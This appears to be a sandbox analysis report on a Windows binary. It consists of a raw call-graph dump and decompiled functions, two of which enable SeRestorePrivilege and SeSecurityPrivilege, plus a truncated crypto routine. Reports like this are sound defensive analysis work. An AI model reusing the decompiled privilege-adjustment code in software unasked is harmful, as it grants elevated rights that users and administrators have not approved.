free 31808->31816 31809 b3fb45 32105 b11e89 free 31809->32105 31819 b3ef30 31810->31819 31811 b401a1 32134 b20c00 free ctype 31811->32134 31812 b3ec20 32053 b11e89 free 31812->32053 31813->31758 31834 b3f703 31814->31834 31835 b3f797 31814->31835 32104 b11e89 free 31815->32104 31816->31680 31818 b3f4c9 32077 b11e89 free 31818->32077 31833 b169ab 28 API calls 31819->31833 31824 b3f7cd 31820->31824 31909 b3f850 31820->31909 31942 b3fe9d 31820->31942 32093 b3e08a malloc _CxxThrowException free GetLastError 31824->32093 31825 b3ec28 31829 b32046 free 31825->31829 31827 b3f4d1 32078 b11e89 free 31827->32078 31829->31701 31830 b401bc 32135 b40309 __EH_prolog 31830->32135 32086 b3e0a5 6 API calls 31831->32086 31832 b3f51d 32079 b11e89 free 31832->32079 31865 b3ef4c 31833->31865 32089 b3e0a5 6 API calls 31834->32089 32092 b11e89 free 31835->32092 31837 b3f8ca GetProcAddress 31846 b3f8e5 31837->31846 31847 b3fb7e GetProcAddress 31837->31847 31842 b3f69d 32087 b11e89 free 31842->32087 31844 b3f525 32080 b11e89 free 31844->32080 31845 b3f716 31855 b56b33 _CxxThrowException 31845->31855 31848 b12d90 2 API calls 31846->31848 31853 b3fb93 31847->31853 31854 b3fc74 31847->31854 31858 b3f8f0 31848->31858 31851->31766 31851->31767 31851->31805 31851->31818 31851->31832 31852 b3f56e 31851->31852 32074 b3e1fe malloc _CxxThrowException free __EH_prolog ctype 31851->32074 32075 b40371 74 API calls ctype 31851->32075 32081 b11e89 free 31852->32081 32109 b3e08a malloc _CxxThrowException free GetLastError 31853->32109 31864 b12d90 2 API calls 31854->31864 31857 b3efa5 32067 b11e89 free 31857->32067 32096 b1606b 7 API calls ctype 31858->32096 31859 b400b7 31886 b40190 31859->31886 31887 b400d0 31859->31887 31860 b401d7 31861 b3f6a7 31862 b12d90 2 API calls 31862->31909 31873 b3fc7f 31864->31873 32066 b11e89 free 31865->32066 31875 b3f576 32082 b11e89 free 31875->32082 31877 b3f7dc 32094 b11e89 free 31877->32094 31878 b12d90 2 API calls 31878->31942 31880 b16058 8 API calls 31880->31909 32133 b20c00 free ctype 31886->32133 32124 b20c00 free ctype 31887->32124 31889 b169ab 28 API calls 31889->31942 31891 b3fab3 32100 b3e0a5 6 API calls 31891->32100 31895 b56b33 _CxxThrowException 31895->31909 31899 b3fac4 32101 b11e89 free 31899->32101 31901 b400e1 31904 b11524 3 API calls 31904->31909 31905 b3fba2 31908 b3face 31909->31837 31909->31862 31909->31880 31909->31891 31909->31895 31909->31904 31926 b11e89 free ctype 31909->31926 32095 b3e1fe malloc _CxxThrowException free __EH_prolog ctype 31909->32095 31912 b3ffb2 CompareFileTime 31917 b3ffc7 CompareFileTime 31912->31917 31912->31942 31917->31942 31926->31909 31934 b3f6bf 32111 b11e89 free 31934->32111 31941 b4002f 31941->31859 31943 b4016d 31941->31943 32123 b20c00 free ctype 31941->32123 31942->31811 31942->31878 31942->31889 31942->31912 31942->31941 31942->31943 32121 b56b77 malloc _CxxThrowException free _CxxThrowException memcpy 31942->32121 32122 b20c00 free ctype 31942->32122 32132 b20c00 free ctype 31943->32132 31981->31522 31982->31529 31983->31533 32148 b11e89 free 31984->32148 31986 b4824e 31986->31476 31987->31614 31988->31477 31989->31501 31990->31512 31991->31521 31992->31526 31993->31476 31995->31537 31996->31550 31997->31561 31998->31542 31999->31548 32000->31578 32001->31543 32002->31544 32003->31549 32004->31556 32005->31575 32006->31554 32007->31572 32008->31577 32009->31605 32010->31609 32011->31619 32012->31606 32013->31623 32014->31568 32015->31588 32016->31568 32017->31476 32018->31480 32019->31495 32020->31504 32021->31516 32022->31633 32023->31642 32026 b3c046 32024->32026 32025 b3c060 32025->31760 32026->32025 32141 b3ce8d 32026->32141 32028->31653 32029->31665 32030->31720 32031->31670 32032->31665 32033->31678 32034->31710 32035->31699 32036->31638 32037->31643 32038->31637 32039->31651 32040->31644 32041->31694 32042->31679 32043->31679 32044->31764 32045->31733 32046->31742 32047->31750 32048->31700 32049->31710 32050->31789 32051->31796 32052->31812 32053->31825 32054->31715 32055->31710 32056->31794 32057->31808 32058->31659 32059->31668 32060->31655 32061->31722 32062->31732 32063->31689 32064->31751 32065->31730 32066->31857 32067->31689 32068->31745 32069->31745 32070->31758 32071->31758 32072->31768 32073->31815 32074->31851 32075->31851 32076->31815 32077->31827 32078->31815 32079->31844 32080->31815 32081->31875 32082->31815 32083->31771 32084->31815 32085->31806 32086->31842 32087->31861 32089->31845 32092->31820 32093->31877 32094->31934 32095->31909 32100->31899 32101->31908 32104->31809 32105->31730 32106->31740 32107->31662 32108->31710 32109->31905 32121->31942 32122->31942 32123->31941 32124->31901 32132->31887 32133->31811 32134->31830 32135->31860 32142 b3ce9e 32141->32142 32143 b3ceab 32141->32143 32144 b3206a 2 API calls 32142->32144 32143->32026 32145 b3cea5 32144->32145 32147 b11e89 free 32145->32147 32147->32143 32148->31986 32149 b49b02 32150 b49b0f 32149->32150 32151 b49b20 32149->32151 32150->32151 32155 b49b27 32150->32155 32156 b4aee7 __EH_prolog 32155->32156 32159 b4af21 32156->32159 32161 b4af04 32156->32161 32158 b49b1a 32162 b11e89 free 32158->32162 32164 b11e89 free 32159->32164 32161->32159 32163 b11e89 free 32161->32163 32162->32151 32163->32161 32164->32158 32165 b54cc2 32170 b54ce2 __EH_prolog 32165->32170 32167 b54cca 32168 b54cda 32167->32168 32172 b11e89 free 32167->32172 32171 b54d02 32170->32171 32171->32167 32172->32168 32173 b386c4 __EH_prolog 32176 b38759 __EH_prolog 32173->32176 32175 b386e3 32179 b5ef23 32176->32179 32177 b3877a 32177->32175 32180 b5ef35 32179->32180 32181 b5ef90 32179->32181 32182 b5ef99 _CxxThrowException __EH_prolog 32180->32182 32184 b5ef49 32180->32184 32181->32177 32183 b11e55 2 API calls 32182->32183 32185 b5efc3 32183->32185 32186 b5ef71 memcpy 32184->32186 32188 b5ef54 _CxxThrowException 32184->32188 32189 b5ef69 32184->32189 32187 b5efd7 32185->32187 32192 b57cdd __EH_prolog 32185->32192 32186->32181 32187->32177 32188->32189 32199 b56bf4 malloc _CxxThrowException free memcpy ctype 32189->32199 32200 b57d91 __EH_prolog 32192->32200 32194 b57d17 32203 b58109 __EH_prolog 32194->32203 32196 b57d2f 32197 b12d90 2 API calls 32196->32197 32198 b57d3e 32197->32198 32198->32187 32199->32186 32204 b51b99 __EH_prolog 32200->32204 32202 b57da7 32202->32194 32203->32196 32209 b4f686 32204->32209 32206 b51baf 32217 b2cd7c malloc _CxxThrowException __EH_prolog 32206->32217 32208 b51bc5 32208->32202 32210 b4f694 32209->32210 32218 b19852 GetModuleHandleA 32210->32218 32213 b4f72a 32213->32206 32214 b4f716 __aulldiv 32214->32213 32215 b4f700 32216 b4f70a __aulldiv 32215->32216 32216->32213 32217->32208 32219 b19883 32218->32219 32220 b198b2 GlobalMemoryStatus 32219->32220 32221 b19887 GlobalMemoryStatusEx 32219->32221 32222 b198cb 32220->32222 32221->32220 32223 b19891 32221->32223 32222->32223 32223->32213 32223->32214 32223->32215 32224 b2aa45 __EH_prolog 32225 b2aa62 32224->32225 32237 b2aa66 32225->32237 32350 b19810 GetCurrentProcess GetProcessAffinityMask 32225->32350 32227 b2aa9c 32228 b19852 3 API calls 32227->32228 32229 b2aacf 32228->32229 32351 b2cd7c malloc _CxxThrowException __EH_prolog 32229->32351 32231 b2aed2 32233 b126d9 2 API calls 32231->32233 32261 b2b192 32231->32261 32232 b12ea8 2 API calls 32265 b2abd3 32232->32265 32234 b2b16a 32233->32234 32353 b1a0b6 10 API calls ctype 32234->32353 32236 b2b176 32354 b11e89 free 32236->32354 32239 b2b626 32239->32237 32241 b2b6a0 32239->32241 32360 b11e89 free 32239->32360 32241->32237 32361 b12735 malloc _CxxThrowException 32241->32361 32243 b2ab2e 32251 b11e89 free ctype 32243->32251 32243->32265 32245 b2b111 32248 b1736b FindCloseChangeNotification 32245->32248 32246 b2b719 32249 b2b737 32246->32249 32362 b1275a malloc _CxxThrowException free ctype 32246->32362 32280 b2b10a 32248->32280 32254 b2b7b8 32249->32254 32257 b2b73c 32249->32257 32251->32243 32252 b12d90 malloc _CxxThrowException 32252->32265 32264 b2b7dc 32254->32264 32364 b1275a malloc _CxxThrowException free ctype 32254->32364 32255 b2b435 32255->32237 32255->32239 32255->32241 32258 b2b5c5 __aulldiv 32255->32258 32357 b2a544 15 API calls 32255->32357 32358 b2a421 memset strlen 32255->32358 32257->32280 32363 b2cdbd 19 API calls 32257->32363 32359 b2a24d memset strlen 32258->32359 32261->32237 32261->32255 32263 b2b30d __aulldiv 32261->32263 32355 b2a24d memset strlen 32261->32355 32356 b2ccf7 __aulldiv 32261->32356 32262 b1736b FindCloseChangeNotification 32262->32265 32263->32261 32267 b2c2f8 32264->32267 32268 b2b851 32264->32268 32265->32231 32265->32232 32265->32245 32265->32252 32265->32262 32272 b11e89 free ctype 32265->32272 32275 b12dd3 2 API calls 32265->32275 32265->32280 32284 b2b140 32265->32284 32286 b2a24d memset strlen 32265->32286 32270 b2c388 32267->32270 32267->32280 32373 b2eb43 free ctype 32267->32373 32345 b2b881 32268->32345 32365 b1275a malloc _CxxThrowException free ctype 32268->32365 32289 b2c47a 32270->32289 32290 b2c3a9 32270->32290 32272->32265 32275->32265 32276 b2c28a 32371 b20c00 free ctype 32276->32371 32279 b126d9 2 API calls 32279->32289 32398 b11e89 free 32280->32398 32281 b126d9 2 API calls 32281->32290 32352 b11e89 free 32284->32352 32286->32265 32287 b11e89 free ctype 32287->32290 32289->32279 32291 b2c52e 32289->32291 32292 b11e89 free ctype 32289->32292 32303 b2c45e 32289->32303 32377 b126fb malloc _CxxThrowException 32289->32377 32378 b1275a malloc _CxxThrowException free ctype 32289->32378 32290->32281 32290->32287 32293 b2c463 32290->32293 32290->32303 32374 b126fb malloc _CxxThrowException 32290->32374 32375 b1275a malloc _CxxThrowException free ctype 32290->32375 32379 b11e89 free 32291->32379 32292->32289 32376 b11e89 free 32293->32376 32296 b2c46e 32380 b11e89 free 32296->32380 32298 b2c64d 32300 b11e55 2 API calls 32298->32300 32299 b56b33 _CxxThrowException 32299->32303 32301 b2c67b 32300->32301 32302 b11e55 2 API calls 32301->32302 32307 b2c68a 32302->32307 32303->32298 32303->32299 32304 b2a2b1 memset 32304->32345 32338 b2c775 32307->32338 32381 b2a2b1 memset 32307->32381 32382 b2a24d memset strlen 32307->32382 32308 b2cb73 32395 b11e89 free 32308->32395 32310 b2cca7 32396 b11e89 free 32310->32396 32312 b2ccaf 32397 b11e89 free 32312->32397 32313 b2cbf2 32313->32308 32315 b2cc41 __aulldiv __aulldiv 32313->32315 32394 b2e9ce memset strlen __aulldiv 32315->32394 32318 b2a2ba memset 32318->32345 32319 b2cb7a 32386 b11e89 free 32319->32386 32322 b2cb82 32387 b11e89 free 32322->32387 32323 b126d9 2 API calls 32323->32345 32325 b2cb8a 32388 b11e89 free 32325->32388 32327 b2cb92 32389 b11e89 free 32327->32389 32330 b2cb9d 32390 b11e89 free 32330->32390 32332 b2bec1 strcmp 32332->32345 32335 b2cbcf 32391 b11e89 free 32335->32391 32338->32308 32338->32313 32338->32319 32338->32330 32342 b2e9ce memset strlen __aulldiv 32338->32342 32383 b2e153 14 API calls ctype 32338->32383 32384 b11e89 free 32338->32384 32385 b2cdbd 19 API calls 32338->32385 32339 b2cbd7 32392 b11e89 free 32339->32392 32341 b2cbdf 32393 b11e89 free 32341->32393 32342->32338 32344 b11e89 free ctype 32344->32345 32345->32276 32345->32280 32345->32304 32345->32318 32345->32323 32345->32332 32345->32344 32346 b2a544 15 API calls 32345->32346 32348 b2c2ae 32345->32348 32366 b2a24d memset strlen 32345->32366 32367 b2e7ce 18 API calls ctype 32345->32367 32368 b126fb malloc _CxxThrowException 32345->32368 32369 b1275a malloc _CxxThrowException free ctype 32345->32369 32370 b2cdbd 19 API calls 32345->32370 32346->32345 32372 b20c00 free ctype 32348->32372 32350->32227 32351->32243 32352->32280 32353->32236 32354->32261 32355->32261 32356->32261 32357->32255 32358->32255 32359->32255 32360->32241 32361->32246 32362->32249 32363->32280 32364->32264 32365->32345 32366->32345 32367->32345 32368->32345 32369->32345 32370->32345 32371->32237 32372->32237 32373->32267 32374->32290 32375->32290 32376->32296 32377->32289 32378->32289 32379->32296 32380->32303 32381->32307 32382->32307 32383->32338 32384->32338 32385->32338 32386->32322 32387->32325 32388->32327 32389->32330 32390->32335 32391->32339 32392->32341 32393->32237 32394->32313 32395->32310 32396->32312 32397->32280 32398->32237 32399 b52808 __EH_prolog 32400 b52826 32399->32400 32403 b52178 __EH_prolog 32400->32403 32402 b52833 32404 b5219f 32403->32404 32406 b521b5 32404->32406 32417 b7c910 memcpy 32404->32417 32406->32402 32407 b521d7 32407->32406 32409 b521e8 32407->32409 32422 b525e6 malloc _CxxThrowException free memcpy _CxxThrowException 32407->32422 32409->32406 32418 b6b290 32409->32418 32412 b52338 32421 b6b2b0 free 32412->32421 32413 b522df 32413->32412 32423 b52765 malloc _CxxThrowException free memcpy _CxxThrowException 32413->32423 32415 b523cd 32415->32412 32416 b6b290 malloc 32415->32416 32416->32412 32417->32407 32419 b6b297 malloc 32418->32419 32420 b6b294 32418->32420 32419->32413 32420->32413 32421->32406 32422->32407 32423->32415

                                                                                                                    Executed Functions

                                                                                                                    Function 00B19032 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1020 b19032-b19057 GetCurrentProcess OpenProcessToken 1021 b19059-b19069 LookupPrivilegeValueW 1020->1021 1022 b190af 1020->1022 1024 b190a1 1021->1024 1025 b1906b-b1908f AdjustTokenPrivileges 1021->1025 1023 b190b2-b190b7 1022->1023 1027 b190a4-b190ad FindCloseChangeNotification 1024->1027 1025->1024 1026 b19091-b1909f GetLastError 1025->1026 1026->1027 1027->1023
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E00B19032(WCHAR* __ecx, signed char __edx) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t17;
				int _t20;
				signed int _t21;
				signed char _t22;
				signed char _t23;
				WCHAR* _t30;

				_v5 = _v5 & 0x00000000;
				_t22 = __edx;
				_t30 = __ecx;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v12) == 0) {
					_t23 = _v5;
				} else {
					_t17 = LookupPrivilegeValueW(0, _t30,  &(_v28.Privileges)); // executed
					if(_t17 == 0) {
						L4:
						_t23 = _v5;
					} else {
						_v28.PrivilegeCount = 1;
						asm("sbb ebx, ebx");
						_v16 =  ~_t22 & 0x00000002;
						_t20 = AdjustTokenPrivileges(_v12, 0,  &_v28, 0, 0, 0); // executed
						if(_t20 == 0) {
							goto L4;
						} else {
							_t21 = GetLastError();
							asm("sbb bl, bl");
							_t23 =  ~_t21 + 1;
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				return _t23;
			}













                                                                                                                    0x00b19038
                                                                                                                    0x00b19042
                                                                                                                    0x00b19044
                                                                                                                    0x00b19057
                                                                                                                    0x00b190af
                                                                                                                    0x00b19059
                                                                                                                    0x00b19061
                                                                                                                    0x00b19069
                                                                                                                    0x00b190a1
                                                                                                                    0x00b190a1
                                                                                                                    0x00b1906b
                                                                                                                    0x00b19078
                                                                                                                    0x00b1907f
                                                                                                                    0x00b19084
                                                                                                                    0x00b19087
                                                                                                                    0x00b1908f
                                                                                                                    0x00000000
                                                                                                                    0x00b19091
                                                                                                                    0x00b19091
                                                                                                                    0x00b1909b
                                                                                                                    0x00b1909d
                                                                                                                    0x00b1909d
                                                                                                                    0x00b1908f
                                                                                                                    0x00b190a7
                                                                                                                    0x00b190a7
                                                                                                                    0x00b190b7

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000020,00B20BCB,?,766BA750,?,?,?,?,00B20BCB,00B209F5), ref: 00B19048
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00B20BCB,00B209F5), ref: 00B1904F
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00B19061
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(00B20BCB,00000000,?,00000000,00000000,00000000), ref: 00B19087
                                                                                                                    • GetLastError.KERNEL32 ref: 00B19091
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00B20BCB,?,?,?,?,00B20BCB,00B209F5), ref: 00B190A7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationOpenPrivilegePrivilegesValue
                                                                                                                    • String ID: SeRestorePrivilege
                                                                                                                    • API String ID: 2838110999-1684392131
                                                                                                                    • Opcode ID: 18ebe8eba7720c4fb7e9a8fdcb20d0b635aabf5757e8d6b2153ce4bdea343415
                                                                                                                    • Instruction ID: 40edaf05278edc31527c9574a96157f51ab30fef26db7900ce25f6e7f4b7502a
                                                                                                                    • Opcode Fuzzy Hash: 18ebe8eba7720c4fb7e9a8fdcb20d0b635aabf5757e8d6b2153ce4bdea343415
                                                                                                                    • Instruction Fuzzy Hash: CF018075941258AFDF105BF19C9DAEE7FBCEF05740F080094E942E3160DA758689D7A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B22A5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1028 b22a5f-b22a95 __EH_prolog GetCurrentProcess call b22afd OpenProcessToken 1031 b22a97-b22ab7 LookupPrivilegeValueW 1028->1031 1032 b22adc-b22af7 call b22afd 1028->1032 1031->1032 1034 b22ab9-b22acc AdjustTokenPrivileges 1031->1034 1034->1032 1036 b22ace-b22ada GetLastError 1034->1036 1036->1032
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00B22A5F(void* __eflags) {
				void* _t16;
				int _t25;
				signed int _t26;
				int _t28;
				void* _t38;

				L00B7F140(0xb837ac, _t38);
				_t28 = 0;
				 *(_t38 - 0x10) = 0;
				 *(_t38 - 4) = 0;
				_t16 = GetCurrentProcess();
				E00B22AFD(_t38 - 0x10);
				if(OpenProcessToken(_t16, 0x28, _t38 - 0x10) != 0) {
					 *(_t38 - 0x20) = 1;
					 *((intOrPtr*)(_t38 - 0x14)) = 2;
					if(LookupPrivilegeValueW(0, L"SeSecurityPrivilege", _t38 - 0x1c) != 0) {
						_t25 = AdjustTokenPrivileges( *(_t38 - 0x10), 0, _t38 - 0x20, 0, 0, 0); // executed
						if(_t25 != 0) {
							_t26 = GetLastError();
							asm("sbb bl, bl");
							_t28 =  ~_t26 + 1;
						}
					}
				}
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				E00B22AFD(_t38 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t28;
			}








                                                                                                                    0x00b22a64
                                                                                                                    0x00b22a6d
                                                                                                                    0x00b22a70
                                                                                                                    0x00b22a73
                                                                                                                    0x00b22a76
                                                                                                                    0x00b22a81
                                                                                                                    0x00b22a95
                                                                                                                    0x00b22a9a
                                                                                                                    0x00b22aa8
                                                                                                                    0x00b22ab7
                                                                                                                    0x00b22ac4
                                                                                                                    0x00b22acc
                                                                                                                    0x00b22ace
                                                                                                                    0x00b22ad8
                                                                                                                    0x00b22ada
                                                                                                                    0x00b22ada
                                                                                                                    0x00b22acc
                                                                                                                    0x00b22ab7
                                                                                                                    0x00b22adc
                                                                                                                    0x00b22ae3
                                                                                                                    0x00b22aef
                                                                                                                    0x00b22af7

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B22A64
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22A76
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22A8D
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00B22AAF
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22AC4
                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22ACE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                                                                                                                    • String ID: SeSecurityPrivilege
                                                                                                                    • API String ID: 3475889169-2333288578
                                                                                                                    • Opcode ID: 4c8048d57182fafe5f30995a158ff3b2dcad490c64a16a3afa12374998d396d5
                                                                                                                    • Instruction ID: 9ffbc59607da9c9068497c267c107624adfc68b96f6226d4b90434f37f7d19f4
                                                                                                                    • Opcode Fuzzy Hash: 4c8048d57182fafe5f30995a158ff3b2dcad490c64a16a3afa12374998d396d5
                                                                                                                    • Instruction Fuzzy Hash: 391121B1900229AFDF10EFA4DC85AFEB7BCFB05744F444569E816E35A0DB748A48DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B53FD5 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E00B53FD5(signed char* __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				signed char _t523;
				intOrPtr _t524;
				signed char* _t525;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t531;
				signed char _t532;
				signed char _t535;
				signed int _t546;
				signed char _t547;
				signed char _t548;
				signed int _t550;
				signed char _t554;
				signed char _t556;
				signed char _t559;
				signed char _t561;
				void* _t562;
				signed char _t568;
				signed char _t569;
				signed char _t570;
				signed char _t575;
				signed char _t577;
				signed int _t581;
				signed char _t582;
				signed char _t588;
				signed char _t590;
				signed char _t594;
				signed char _t596;
				signed char _t597;
				signed char _t604;
				signed char _t610;
				signed char _t615;
				signed char* _t619;
				signed char _t627;
				signed char _t629;
				void* _t633;
				signed int _t636;
				intOrPtr* _t642;
				signed int _t643;
				signed char _t644;
				signed int _t646;
				signed char _t647;
				signed char _t659;
				char _t667;
				signed char _t675;
				signed char _t680;
				intOrPtr _t683;
				signed char _t685;
				void* _t688;
				signed char _t698;
				signed char _t699;
				signed char _t703;
				signed char _t705;
				signed char _t707;
				signed char _t708;
				signed char _t711;
				intOrPtr _t727;
				signed char* _t728;
				signed char* _t732;
				signed int _t738;
				signed char _t761;
				signed char _t784;
				signed char _t787;
				signed int _t796;
				signed char _t800;
				intOrPtr* _t801;
				signed char _t807;
				signed char _t811;
				signed int _t815;
				signed char _t829;
				signed char _t849;
				signed int _t852;
				signed int _t853;
				intOrPtr* _t858;
				void* _t870;
				signed char _t873;
				signed char _t875;
				signed char _t876;
				signed char _t877;
				signed int _t880;
				signed char _t881;
				signed char* _t883;
				signed char* _t884;
				signed int _t885;
				signed char _t886;
				signed char _t887;
				intOrPtr _t889;
				signed char _t890;
				signed char _t891;
				signed int _t894;
				intOrPtr* _t895;
				intOrPtr _t896;
				signed char _t897;
				intOrPtr _t898;
				void* _t899;

				L00B7F140(0xb8720e, _t899);
				 *(_t899 - 0x14) = __ecx;
				_t880 =  *(_t899 + 0x18);
				 *( *(_t899 + 0x2c)) =  *( *(_t899 + 0x2c)) & 0x00000000;
				_t873 = _t880 << 2;
				_t705 =  *((intOrPtr*)( *(_t899 + 0x14) + 8)) +  *(_t873 +  *((intOrPtr*)( *(_t899 + 0x14) + 0x30))) * 8;
				 *(_t899 - 0x2c) = _t705;
				E00B54D29(_t899 - 0x5c);
				 *(_t899 - 4) =  *(_t899 - 4) & 0x00000000;
				L00B5B693( *(_t899 + 0x14), _t880, _t899 - 0x5c);
				 *(_t899 - 0x44) =  *( *((intOrPtr*)( *(_t899 + 0x14) + 0x34)) + _t880) & 0x000000ff;
				if( *(_t899 - 0x58) <= 0x20) {
					L00B4D457(_t899 - 0xc8);
					 *(_t899 - 4) = 1;
					E00B56896(_t899 - 0x88);
					 *(_t899 - 4) = 2;
					E00B54D69(_t899 - 0x5c, _t899 - 0xc8, __eflags);
					_t519 = L00B4D09B(_t899 - 0xc8, __eflags);
					__eflags = _t519;
					if(_t519 == 0) {
						L133:
						_t881 = 0x80004001;
						L199:
						_t499 = _t899 - 4;
						 *_t499 =  *(_t899 - 4) & 0x00000000;
						__eflags =  *_t499;
						E00B11E89(_t519,  *((intOrPtr*)(_t899 - 0x88)));
						L00B4D488(_t899 - 0xc8);
						goto L200;
					}
					_t849 =  *(_t899 + 0x14);
					 *(_t899 + 0x1b) = 1;
					_t524 =  *((intOrPtr*)(_t849 + 0x28));
					_t852 = ( *( *((intOrPtr*)(_t849 + 0x34)) + _t880) & 0x000000ff) +  *((intOrPtr*)(_t873 +  *((intOrPtr*)(_t849 + 0x2c))));
					__eflags =  *(_t899 + 0x1c);
					_t727 =  *((intOrPtr*)(_t524 + _t852 * 8));
					_t519 =  *(_t524 + 4 + _t852 * 8);
					if( *(_t899 + 0x1c) == 0) {
						L13:
						_t525 =  *(_t899 - 0x14);
						__eflags =  *_t525;
						if( *_t525 == 0) {
							L15:
							_t728 =  *(_t899 - 0x14);
							 *_t728 =  *_t728 & 0x00000000;
							_t526 = _t728[0x5c];
							_t883 =  &(_t728[0x5c]);
							__eflags = _t526;
							if(_t526 != 0) {
								 *((intOrPtr*)( *_t526 + 8))(_t526);
								 *_t883 =  *_t883 & 0x00000000;
								__eflags =  *_t883;
								_t728 =  *(_t899 - 0x14);
							}
							__eflags = _t728[1];
							_push(0x84);
							if(_t728[1] == 0) {
								_t527 = E00B11E55();
								 *(_t899 - 0x64) = _t527;
								__eflags = _t527;
								 *(_t899 - 4) = 4;
								if(__eflags == 0) {
									_t528 = 0;
									__eflags = 0;
								} else {
									_t528 = L00B4D386(_t527, __eflags, 0);
								}
								 *(_t899 - 4) = 2;
								( *(_t899 - 0x14))[0x50] = _t528;
								E00B1A98B(_t883, _t528);
								_t531 = ( *(_t899 - 0x14))[0x50];
							} else {
								_t698 = E00B11E55();
								 *(_t899 - 0x64) = _t698;
								__eflags = _t698;
								 *(_t899 - 4) = 3;
								if(__eflags == 0) {
									_t699 = 0;
									__eflags = 0;
								} else {
									_t699 = E00B54C0F(_t698, __eflags, 0);
								}
								 *(_t899 - 4) = 2;
								( *(_t899 - 0x14))[0x54] = _t699;
								E00B1A98B(_t883, _t699);
								_t531 = ( *(_t899 - 0x14))[0x54];
							}
							__eflags = _t531;
							if(_t531 == 0) {
								_t532 = 0;
								__eflags = 0;
							} else {
								_t532 = _t531 + 4;
							}
							_t732 =  *(_t899 - 0x14);
							_t853 = _t899 - 0xc8;
							_t732[0x58] = _t532;
							_t535 =  *((intOrPtr*)( *(_t732[0x58]) + 4))(_t853);
							__eflags = _t535;
							if(_t535 == 0) {
								 *(_t899 - 0x1c) =  *(_t899 - 0x1c) & 0x00000000;
								__eflags =  *(_t899 - 0x58);
								if(__eflags <= 0) {
									L43:
									_t884 =  &(( *(_t899 - 0x14))[4]);
									L00B4D4B7(_t884, __eflags, _t899 - 0xc8);
									_t109 =  &(_t884[0x40]); // 0x42
									E00B4ECB8(_t109, _t899 - 0x88);
									 *( *(_t899 - 0x14)) = 1;
									L44:
									_t519 =  *((intOrPtr*)( *(( *(_t899 - 0x14))[0x58]) + 0x14))();
									_t885 = 0;
									__eflags = _t519;
									if(_t519 != 0) {
										goto L30;
									}
									 *(_t899 - 0x15) =  *(_t899 - 0x15) & 0x00000000;
									__eflags =  *(_t899 - 0x58);
									 *((intOrPtr*)(_t899 - 0x40)) = 0;
									 *((intOrPtr*)(_t899 - 0x28)) = 0;
